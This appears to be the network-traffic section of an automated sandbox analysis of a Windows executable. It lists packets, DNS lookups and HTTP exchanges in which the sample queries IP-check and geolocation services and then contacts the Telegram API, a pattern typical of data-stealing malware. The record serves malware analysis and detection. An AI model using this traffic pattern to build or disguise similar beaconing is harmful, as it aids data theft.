                                                                                                                    Jan 11, 2025 08:08:35.181639910 CET44349776104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:35.181708097 CET49776443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:35.181946993 CET49776443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:35.181966066 CET44349776104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:35.233200073 CET4977180192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:35.640839100 CET44349776104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:35.642447948 CET49776443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:35.642479897 CET44349776104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:35.762336969 CET44349776104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:35.762409925 CET44349776104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:35.762562990 CET49776443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:35.763031006 CET49776443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:35.766545057 CET4977180192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:35.767769098 CET4977980192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:35.771507978 CET8049771193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:35.771610975 CET4977180192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:35.772552967 CET8049779193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:35.772633076 CET4977980192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:35.772748947 CET4977980192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:35.777527094 CET8049779193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:36.223711014 CET8049779193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:36.256769896 CET49784443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:36.256818056 CET44349784104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:36.256896973 CET49784443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:36.257190943 CET49784443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:36.257205963 CET44349784104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:36.264419079 CET4977980192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:36.709156990 CET44349784104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:36.710628033 CET49784443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:36.710642099 CET44349784104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:36.862021923 CET44349784104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:36.862224102 CET44349784104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:36.862277985 CET49784443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:36.862854958 CET49784443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:36.867862940 CET4977980192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:36.868865013 CET4979080192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:36.872855902 CET8049779193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:36.872908115 CET4977980192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:36.873672009 CET8049790193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:36.873766899 CET4979080192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:36.873939991 CET4979080192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:36.878753901 CET8049790193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:37.333581924 CET8049790193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:37.334757090 CET49792443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:37.334789991 CET44349792104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:37.334904909 CET49792443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:37.335104942 CET49792443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:37.335115910 CET44349792104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:37.389441967 CET4979080192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:37.807667017 CET44349792104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:37.810986042 CET49792443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:37.811007977 CET44349792104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:37.928320885 CET44349792104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:37.928390026 CET44349792104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:37.928478956 CET49792443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:37.928937912 CET49792443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:37.934082031 CET4979080192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:37.934634924 CET4979780192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:37.939068079 CET8049790193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:37.939131021 CET4979080192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:37.939436913 CET8049797193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:37.939543009 CET4979780192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:37.939665079 CET4979780192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:37.947480917 CET8049797193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:38.398200035 CET8049797193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:38.399878025 CET49802443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:38.399925947 CET44349802104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:38.399983883 CET49802443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:38.400259018 CET49802443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:38.400270939 CET44349802104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:38.451903105 CET4979780192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:38.854319096 CET44349802104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:38.855899096 CET49802443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:38.855916023 CET44349802104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:38.983529091 CET44349802104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:38.983593941 CET44349802104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:38.983633041 CET49802443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:38.984163046 CET49802443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:38.991542101 CET4979780192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:38.992559910 CET4980880192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:38.996685028 CET8049797193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:38.996825933 CET4979780192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:38.997385979 CET8049808193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:38.997447968 CET4980880192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:38.997546911 CET4980880192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:39.002321005 CET8049808193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:39.460645914 CET8049808193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:39.462501049 CET49809443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:39.462553024 CET44349809104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:39.462634087 CET49809443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:39.463077068 CET49809443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:39.463088989 CET44349809104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:39.514441013 CET4980880192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:39.915182114 CET44349809104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:39.917208910 CET49809443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:39.917241096 CET44349809104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:40.057847977 CET44349809104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:40.057923079 CET44349809104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:40.057986975 CET49809443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:40.058495045 CET49809443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:40.063493967 CET4980880192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:40.064599037 CET4981580192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:40.068454027 CET8049808193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:40.068510056 CET4980880192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:40.069427013 CET8049815193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:40.069483995 CET4981580192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:40.069653034 CET4981580192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:40.074482918 CET8049815193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:40.527565956 CET8049815193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:40.528796911 CET49821443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:40.528840065 CET44349821104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:40.528919935 CET49821443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:40.529268026 CET49821443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:40.529278040 CET44349821104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:40.576971054 CET4981580192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:41.011307955 CET44349821104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:41.013288021 CET49821443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:41.013312101 CET44349821104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:41.140933990 CET44349821104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:41.140996933 CET44349821104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:41.141139030 CET49821443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:41.142102003 CET49821443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:41.193156958 CET4981580192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:41.198134899 CET8049815193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:41.198199034 CET4981580192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:41.204442024 CET49824443192.168.2.9149.154.167.220
                                                                                                                    Jan 11, 2025 08:08:41.204478025 CET44349824149.154.167.220192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:41.204658031 CET49824443192.168.2.9149.154.167.220
                                                                                                                    Jan 11, 2025 08:08:41.205077887 CET49824443192.168.2.9149.154.167.220
                                                                                                                    Jan 11, 2025 08:08:41.205087900 CET44349824149.154.167.220192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:41.832700014 CET44349824149.154.167.220192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:41.832915068 CET49824443192.168.2.9149.154.167.220
                                                                                                                    Jan 11, 2025 08:08:41.834763050 CET49824443192.168.2.9149.154.167.220
                                                                                                                    Jan 11, 2025 08:08:41.834777117 CET44349824149.154.167.220192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:41.835031033 CET44349824149.154.167.220192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:41.836345911 CET49824443192.168.2.9149.154.167.220
                                                                                                                    Jan 11, 2025 08:08:41.879328966 CET44349824149.154.167.220192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:42.078249931 CET44349824149.154.167.220192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:42.078340054 CET44349824149.154.167.220192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:42.078428030 CET49824443192.168.2.9149.154.167.220
                                                                                                                    Jan 11, 2025 08:08:42.146946907 CET49824443192.168.2.9149.154.167.220
                                                                                                                    Jan 11, 2025 08:08:48.678025007 CET49874443192.168.2.9149.154.167.220
                                                                                                                    Jan 11, 2025 08:08:48.678052902 CET44349874149.154.167.220192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:48.678112030 CET49874443192.168.2.9149.154.167.220
                                                                                                                    Jan 11, 2025 08:08:48.678436995 CET49874443192.168.2.9149.154.167.220
                                                                                                                    Jan 11, 2025 08:08:48.678451061 CET44349874149.154.167.220192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:49.295169115 CET44349874149.154.167.220192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:49.297076941 CET49874443192.168.2.9149.154.167.220
                                                                                                                    Jan 11, 2025 08:08:49.297115088 CET44349874149.154.167.220192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:49.297171116 CET49874443192.168.2.9149.154.167.220
                                                                                                                    Jan 11, 2025 08:08:49.297177076 CET44349874149.154.167.220192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:49.471709013 CET44349874149.154.167.220192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:49.471790075 CET44349874149.154.167.220192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:49.471847057 CET49874443192.168.2.9149.154.167.220
                                                                                                                    Jan 11, 2025 08:08:49.472450018 CET49874443192.168.2.9149.154.167.220
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 11, 2025 08:08:31.063249111 CET6105953192.168.2.91.1.1.1
                                                                                                                    Jan 11, 2025 08:08:31.071763992 CET53610591.1.1.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:32.023024082 CET6362153192.168.2.91.1.1.1
                                                                                                                    Jan 11, 2025 08:08:32.030275106 CET53636211.1.1.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:41.193849087 CET5712553192.168.2.91.1.1.1
                                                                                                                    Jan 11, 2025 08:08:41.200885057 CET53571251.1.1.1192.168.2.9
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Jan 11, 2025 08:08:31.063249111 CET192.168.2.91.1.1.10x65aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 08:08:32.023024082 CET192.168.2.91.1.1.10x8efStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 08:08:41.193849087 CET192.168.2.91.1.1.10x99d4Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Jan 11, 2025 08:08:24.345695019 CET1.1.1.1192.168.2.90xc943No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Jan 11, 2025 08:08:24.345695019 CET1.1.1.1192.168.2.90xc943No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 08:08:31.071763992 CET1.1.1.1192.168.2.90x65aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Jan 11, 2025 08:08:31.071763992 CET1.1.1.1192.168.2.90x65aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 08:08:31.071763992 CET1.1.1.1192.168.2.90x65aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 08:08:31.071763992 CET1.1.1.1192.168.2.90x65aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 08:08:31.071763992 CET1.1.1.1192.168.2.90x65aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 08:08:31.071763992 CET1.1.1.1192.168.2.90x65aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 08:08:32.030275106 CET1.1.1.1192.168.2.90x8efNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 08:08:32.030275106 CET1.1.1.1192.168.2.90x8efNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 08:08:32.030275106 CET1.1.1.1192.168.2.90x8efNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 08:08:32.030275106 CET1.1.1.1192.168.2.90x8efNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 08:08:32.030275106 CET1.1.1.1192.168.2.90x8efNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 08:08:32.030275106 CET1.1.1.1192.168.2.90x8efNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 08:08:32.030275106 CET1.1.1.1192.168.2.90x8efNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 11, 2025 08:08:41.200885057 CET1.1.1.1192.168.2.90x99d4No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                    • reallyfreegeoip.org
                                                                                                                    • api.telegram.org
                                                                                                                    • checkip.dyndns.org
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.949747193.122.130.0807664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 08:08:31.089056969 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 08:08:31.552875996 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:31 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: c114ff3151b90e371f143969a07df4a0
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                    Jan 11, 2025 08:08:31.557692051 CET127OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Jan 11, 2025 08:08:31.658701897 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:31 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: b91e6cd0f5941294d63c61ab624a7ac0
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                    Jan 11, 2025 08:08:32.697225094 CET127OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Jan 11, 2025 08:08:32.799482107 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:32 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: 27009aaa3b8a57d97ba8c4554a6753ec
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.949761193.122.130.0807664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 08:08:33.637767076 CET127OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Jan 11, 2025 08:08:34.093103886 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:34 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: a004385f76baa229443b4750ae4cea11
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.949771193.122.130.0807664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 08:08:34.697932959 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 08:08:35.180303097 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:35 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: 5c0da55dc8347bea9d9fab4d21489fd7
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.949779193.122.130.0807664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 08:08:35.772748947 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 08:08:36.223711014 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:36 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: b639ba400521558ead45569dbf8c29d6
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.949790193.122.130.0807664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 08:08:36.873939991 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 08:08:37.333581924 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:37 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: 23af81321f6fb675a966c463db933009
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.949797193.122.130.0807664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 08:08:37.939665079 CET151OUTGET / HTTP/1.1
